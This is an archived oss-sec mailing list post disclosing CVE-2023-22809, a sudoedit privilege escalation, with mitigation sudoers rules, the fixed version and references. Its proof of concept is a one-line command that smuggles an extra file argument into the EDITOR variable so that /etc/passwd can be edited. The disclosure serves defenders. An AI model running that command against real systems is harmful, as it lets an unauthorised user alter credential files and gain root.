https://seclists.org/oss-sec/2023/q1/42 [nst-i] [nst-i] Home page logo Nmap.org Npcap.com Seclists.org Sectools.org Insecure.org [ ] [nst-icons] oss-sec logo oss-sec mailing list archives Previous By Date Next Previous By Thread Next [ ] [nst-icons] CVE-2023-22809: Sudoedit can edit arbitrary files --------------------------------------------------------------------- From: Matthieu Barjole Date: Thu, 19 Jan 2023 01:33:43 +0100 --------------------------------------------------------------------- Hello everyone, While auditing Sudo, Synacktiv identified a privilege escalation in sudoedit when a user is authorized to use it by the sudoers policy. This vulnerability was assigned CVE-2023-22809 and affects Sudo versions 1.8.0 through 1.9.12p1 inclusive. ## Analysis The technical analysis can be found in the following security advisory: https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf ## Proof of Concept Assuming the following sudoers policy: ``` # cat /etc/sudoers user ALL=(ALL:ALL) sudoedit /etc/motd [...] ``` Arbitrary files such as `/etc/passwd` may also be edited as such: ``` EDITOR='vim -- /etc/passwd' sudoedit /etc/motd ``` ## Mitigation It is possible to prevent a user-specified editor from being used by sudoedit by adding the following line to the sudoers file. ``` Defaults!sudoedit env_delete+="SUDO_EDITOR VISUAL EDITOR" ``` To restrict the editor when editing specific files, a Cmnd_Alias can be used, for example: ``` Cmnd_Alias EDIT_MOTD = sudoedit /etc/motd Defaults!EDIT_MOTD env_delete+="SUDO_EDITOR VISUAL EDITOR" user ALL = EDIT_MOTD ``` ## Fix The issue was fixed in Sudo 1.9.12.p2. ## References [1] https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf [2] https://www.sudo.ws/security/advisories/sudoedit_any/ [3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22809 --------------------------------------------------------------------- Previous By Date Next Previous By Thread Next Current thread: * CVE-2023-22809: Sudoedit can edit arbitrary files Matthieu Barjole (Jan 18) [ ] [nst-icons] Nmap Security Scanner * Ref Guide * Install Guide * Docs * Download * Nmap OEM Npcap packet capture * User's Guide * API docs * Download * Npcap OEM Security Lists * Nmap Announce * Nmap Dev * Full Disclosure * Open Source Security * BreachExchange Security Tools * Vuln scanners * Password audit * Web scanners * Wireless * Exploitation About * About/Contact * Privacy * Advertising * Nmap Public Source License [nst] [nst] [nst] [nst]